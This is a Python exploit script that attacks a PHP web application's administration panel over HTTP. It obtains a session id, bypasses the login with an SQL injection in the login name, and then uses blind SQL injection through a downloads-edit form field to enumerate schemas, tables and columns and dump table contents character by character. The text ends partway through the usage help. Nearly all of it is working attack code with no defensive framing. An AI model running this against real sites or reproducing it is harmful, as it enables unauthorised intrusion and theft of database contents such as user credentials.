#!/usr/bin/python import sys import httplib, urllib import types lookupString='name="anzahl" value="' def generateHeaders(host, sessid): headers = {'Host':host, 'User-Agent':'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv: Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language':'en-us,en;q=0.5', 'Accept-Encoding':'deflate', 'Accept-Charset:':'ISO-8859-1,utf-8;q=0.7,*;q=0.7', 'Keep-Alive':'115', 'Connection':'keep-alive', 'Content-Type':'application/x-www-form-urlencoded', 'Referer':'http://' + host, 'Cookie':'PHPSESSID='+sessid} if sessid == '': del headers['Cookie'] return headers def loginRequest(connection, sessid, host, path): headers = generateHeaders(host, sessid) params = urllib.urlencode({'login_form':'1','login_name':'or \'=\'','login_pw':''}) connection.request('POST', path + 'administration/index.php', params, headers) return connection.getresponse() def generateSessId(connection, host, path): headers = generateHeaders(host, '') connection.request('GET', path + 'stats/online_users.php', '', headers) response = connection.getresponse() cookie = response.getheader('Set-Cookie') if type(cookie) is types.NoneType: print '[-] Could not get session id. Wrong path?' exit(2) return cookie[10:cookie.find(';')] def genSessid(host, path): print '[+] Trying ' + host + path con = connectToHost(host) sessid = generateSessId(con, host, path) print '[+] Acquired PHPSESSID -> ' + sessid con = connectToHost(sys.argv[1]) output = loginRequest(con, sessid, host, path).read() if output.find('login_name') != -1: print '[-] Could not bypass login' exit(7) return sessid def guessLen(sessid, host, field, path, dId, table): headers = generateHeaders(host, sessid) connection = connectToHost(host) params = urllib.urlencode({'dl_id':dId, 'name':'test','url':'http://test.com', 'wert':'test', 'timestamp_eintrag':'2010-11-17, 15:43:00', 'timestamp':'2010-11-17, 15:43:00', 'edit_download':'Save entry', 'anzahl':'(select length(val) from (select '+field+' as val from '+table+') as xYsdS)'}) connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers) response = connection.getresponse().read() if response.find('command denied') != -1: print '[-] Could not acces table. Acces denied.' exit(4) index = response.find(lookupString) return int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))])) def guessField(sessid, host, path, dId, field, table): sz=guessLen(sessid, host, field, path, dId, table) headers = generateHeaders(host, sessid) i=1 while i <= sz: connection = connectToHost(host) params = urllib.urlencode({'dl_id':dId, 'name':'test','url':'http://test.com', 'wert':'test', 'timestamp_eintrag':'2010-11-17, 15:43:00', 'timestamp':'2010-11-17, 15:43:00', 'edit_download':'Save entry', 'anzahl':'(select ascii(substring(val,'+str(i)+',1)) from (select '+field+' as val from '+table+') as x)'}) connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers) response = connection.getresponse().read() index = response.find(lookupString) sys.stdout.write(chr(int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))])))) sys.stdout.flush() i += 1 def getValidId(sessid, host, path): headers = generateHeaders(host, sessid) connection = connectToHost(host) connection.request('GET', path + 'administration/index.php?cat=downloads', '', headers) response = connection.getresponse().read() if response.find('ID') == -1: print '[-] Downloads seem to be deactivated' exit(6) index=response.find('index.php?cat=downloads&edit=') return int(str(response[index+len('index.php?cat=downloads&edit='):response.find('"', index+len('index.php?cat=downloads&edit='))])) def getRowCount(sessid, host, path, dId, field, table): headers = generateHeaders(host, sessid) connection = connectToHost(host) params = urllib.urlencode({'dl_id':dId, 'name':'test','url':'http://test.com', 'wert':'test', 'timestamp_eintrag':'2010-11-17, 15:43:00', 'timestamp':'2010-11-17, 15:43:00', 'edit_download':'Save entry', 'anzahl':'(select count(distinct('+field+')) from '+table+')'}) connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers) response = connection.getresponse().read() if response.find('command denied') != -1: print '[-] Could not acces table. Acces denied.' exit(4) index = response.find(lookupString) return int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))])) def getSchemas(sessid, host, path, dId): rows=getRowCount(sessid, host, path, dId,'schema_name', 'information_schema.schemata') print '[+] Schema count: ' + str(rows) for i in range(0, rows): sys.stdout.write('[+] Table name: ') guessField(sessid, host, path, dId,'schema_name', 'information_schema.schemata limit 1 offset '+str(i)) print '' def getTables(sessid, host, path, dId): rows=getRowCount(sessid, host, path, dId,'table_name', 'information_schema.tables') print '[+] Table count: ' + str(rows) for i in range(0, rows): sys.stdout.write('[+] Table name: ') guessField(sessid, host, path, dId,'table_name', 'information_schema.tables limit 1 offset '+str(i)) print '' def getColumns(sessid, host, path, dId, table): rows=getRowCount(sessid, host, path, dId,'column_name', 'information_schema.columns where table_name = \'' + table + '\'') print '[+] Column count: ' + str(rows) for i in range(0, rows): sys.stdout.write('[+] Column name: ') guessField(sessid, host, path, dId,'column_name', 'information_schema.columns where table_name = \'' + table + '\' limit 1 offset '+str(i)) print '' def getItems(sessid, host, path, dId, table, columns, orderby): rows=getRowCount(sessid, host, path, dId, columns[0], table) print '[+] Item count: ' + str(rows) print '[+] Dump:' for i in range(0, rows): for col in columns: if len(orderby): sys.stdout.write(' || ') guessField(sessid, host, path, dId, col, table+' order by ' + orderby + ' limit 1 offset '+str(i)) else: sys.stdout.write(' || ') guessField(sessid, host, path, dId, col, table+' limit 1 offset '+str(i)) print ' || ' def connectToHost(host): con = httplib.HTTPConnection(sys.argv[1], 80) tries=5 recon=True while tries > 0 and recon == True: try: con.connect(); recon = False except: tries -= 1 if tries == 0: print '[-] Could not establish connection' exit(3) return con def printHelp(): print '[-] Usage ' + sys.argv[0] + '